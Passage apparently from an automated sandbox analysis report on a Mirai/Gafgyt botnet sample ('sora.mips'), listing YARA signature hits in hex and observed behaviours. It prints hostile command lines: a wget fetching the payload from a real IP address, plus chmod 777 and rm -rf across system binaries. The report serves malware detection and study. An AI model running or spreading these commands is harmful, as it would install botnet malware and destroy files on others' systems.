49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ea4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12eb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ecc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ee0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6227.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x132a8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6218.1.00007f020c400000.00007f020c414000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6218.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x12d50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12da0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12db4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12dc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ddc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12df0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ea4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12eb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ecc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ee0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6218.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x132a8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6220.1.00007f020c400000.00007f020c414000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6220.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x12d50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12da0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12db4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12dc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ddc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12df0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ea4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12eb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ecc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ee0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6220.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x132a8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: sora.mips PID: 6221	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x5bba:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5bce:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5be2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5bf6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c0a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c1e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c32:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c46:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c5a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c6e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c82:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c96:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5caa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5cbe:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5cd2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5ce6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5cfa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5d0e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5d22:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5d36:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5d4a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: sora.mips PID: 6229	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x499:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4ad:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4c1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4d5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4e9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4fd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x511:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x525:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x539:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x54d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x561:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x575:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x589:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x59d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5b1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5d9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5ed:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x601:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x615:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x629:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: sora.mips PID: 6229	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0xd55:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: sora.mips PID: 6418	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x5aa1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5ab5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5ac9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5add:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5af1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5b05:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5b19:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5b2d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5b41:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5b55:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5b69:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5b7d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5b91:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5ba5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5bb9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5bcd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5be1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5bf5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c09:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c1d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5c31:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: sora.mips PID: 6418	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x635d:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Click to see the 24 entries

Chmod executable: /usr/bin/chmod -> chmod 777 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash bashbug batch bc bccmd bdftopcf

Jump to behavior

Source: /bin/sh (PID: 6214)

Curl executable: /usr/bin/curl -> curl cd /tmp

Jump to behavior

Source: /bin/sh (PID: 6233)

Rm executable: /usr/bin/rm -> rm -rf 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash bashbug batch bc bccmd bdftopcf

Jump to behavior

Source: /bin/sh (PID: 6216)

Wget executable: /usr/bin/wget -> wget http://185.196.11.177/bins/sora.mips

Jump to behavior

Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/2to3-2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/7z (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/7za (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/7zr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/GET (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/HEAD (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/NF (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/POST (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Thunar (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/VGAuthService (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/X (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/X11 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Xephyr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Xorg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Xwayland (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/[ (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aa-enabled (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aa-exec (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aconnect (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/acpi_listen (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/add-apt-repository (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/addpart (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/addr2line (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/al (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/al2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsabat (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsaloop (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsamixer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsatplg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsaucm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/amidi (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/amixer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apgbfm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aplay (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aplaymidi (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-bug (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-cli (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-collect (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-unpack (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/appres (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/appstreamcli (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aprofutil (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apropos (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-add-repository (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-cache (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-cdrom (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-config (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-extracttemplates (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-ftparchive (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-get (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-key (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-mark (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-sortpkgs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aptdcon (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apturl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apturl-gtk (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ar (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arch (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arecord (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arecordmidi (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arm2hpdl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/as (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
